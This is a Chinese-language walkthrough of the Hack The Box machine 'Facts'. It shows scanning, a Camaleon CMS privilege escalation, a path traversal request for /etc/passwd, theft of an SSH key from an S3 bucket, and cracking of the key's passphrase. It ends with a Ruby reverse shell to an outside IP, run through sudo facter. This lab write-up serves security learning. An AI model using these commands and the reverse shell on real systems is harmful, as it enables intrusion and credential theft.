HTB赛季10 - Facts

前言

各位小伙伴,赛季10开启了,但是我最近实在太忙,实在没心情将图片拖进来了,可能会影响大家的阅读体验,但这同时也是锻炼各位的机会哈哈哈。之后空闲下来,会恢复文章品质的。Sorry啦。

复制代码
10.129.18.81

nmap扫描

复制代码
sudo nmap --top-ports 10000 10.129.18.81 --min-rate=1000 -oA ips_quick_TCP_nmapscan && sudo nmap --top-ports 10000 10.129.18.81 --min-rate=1000 -sU -oA ips_quick_UDP_nmapscan && nmap -p- 10.129.18.81 -oA ips_full_TCP_nmapscan --min-rate=1000 && sudo nmap -p- 10.129.18.81 -sU -oA ips_full_UDP_nmapscan --min-rate=1000

!\[Pasted image 20260201201638.png]

扫描vhost

复制代码
ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://facts.htb/ -H 'Host: FUZZ.facts.htb' -mc all -fw 18

ffuf -w test.txt:FUZZ -u http://facts.htb/FUZZ  -mc all -fw 1248

!\[Pasted image 20260201203127.png]

我们进入/admin页面并创建用户

!\[Pasted image 20260201203159.png]

Camaleon CMS - N day 漏洞 - 任意文件读取 & Web账户提权到Admin

成功进入页面

!\[Pasted image 20260201203228.png]

该页面告诉我们了N day漏洞 https://www.tenable.com/security/research/tra-2025-09 ,经过分析我获取了administrator权限,其只要原因是updated_ajax的权限控制存在缺失导致的,会将所有的password里面的内容全部信任。

!\[Pasted image 20260201205350.png]

!\[Pasted image 20260201205337.png]

我们接着发现了一个桶服务器

!\[Pasted image 20260201210833.png]

我们配置aws准备访问

复制代码
aws configure --profile htb

aws s3 ls --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 cp s3://internal/.ssh/id_ed25519 ./ --profile htb  --endpoint-url http://10.129.18.81:54321

!\[Pasted image 20260201210930.png]

我们提取一下谁使用这个密钥

复制代码
grep -v '\-\-' id_ed25519|base64 -d|strings

可惜没有任何信息,我们去网页搜集所有用户名

复制代码
Bob
Carol
Dave

我们进一步覆盖authorized_keys

复制代码
aws s3 cp ./authorized_keys s3://internal/.ssh/authorized_keys --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 ls internal/.ssh/ --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 ls internal --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 cp s3://randomfacts/* ./ --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 sync s3://internal ./internal \
  --profile htb \
  --endpoint-url http://10.129.18.81:54321

我们并没有找到用户名字,我们继续查看CMS的漏洞情况,发现存在路径遍历漏洞

!\[Pasted image 20260201220217.png]

复制代码
http://facts.htb/admin/media/download_private_file?file=../../../../../../etc/passwd

我们尝试登录

!\[Pasted image 20260201220246.png]

复制代码
ssh -i id_ed25519 trivia@facts.htb 

!\[Pasted image 20260201220324.png]

我们在云里面曾经写入了authorized_keys文件,所以我们尝试用自己的私钥登录

复制代码
ssh -i ~/.ssh/id_ed25519 trivia@facts.htb 

aws s3 ls internal/.ssh/ --profile htb  --endpoint-url http://10.129.18.81:54321

我们进一步查看,发现云里面的只是复制内容。我们只能破解id_ed25519

复制代码
ssh2john id_ed25519
john hash --wordlist=/home/kali/Desktop/Info/zhuzhuzxia/Passwords/rockyou.txt

!\[Pasted image 20260201220959.png]

复制代码
dragonballz

我们发现,该指令会执行/tmp目录下的第一个rb文件

复制代码
sudo /usr/bin/facter --custom-dir=/tmp/ x

所以我们编写RB文件放在/tmp下即可

复制代码
#!/usr/bin/env ruby

puts "Hello, Ruby"
spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.17.114",80))

然后执行

复制代码
sudo /usr/bin/facter --custom-dir=/tmp/ x
相关推荐
Flynt4 天前
npm v12 来了:allowScripts 默认关闭,我的项目差点跑不起来
安全·npm·node.js
冬奇Lab9 天前
Skill 系列(02):Skill 安全风险——三类攻击面的实战测试
人工智能·安全·开源
Aphasia31112 天前
VPN 与内网穿透
安全
Mr_愚人派13 天前
当"Claude"不再是 Claude:一次第三方 API 代理引发的 AI 身份伪造排查实录
人工智能·安全
DaLi Yao14 天前
【无标题】
人工智能·安全
Alsn8614 天前
等待学习-学习目录:Docker 容器安全攻防
学习·安全·docker
网络研究院14 天前
2026年网络安全
网络·安全·法律·法规·趋势·发展
酣大智14 天前
ARP代理--工作原理
运维·网络·arp·arp代理
treesforest14 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
shushangyun_14 天前
2026年快消品B2B系统推荐:支持终端门店订货、促销政策自动化的工具?
java·运维·网络·数据库·人工智能·spring·自动化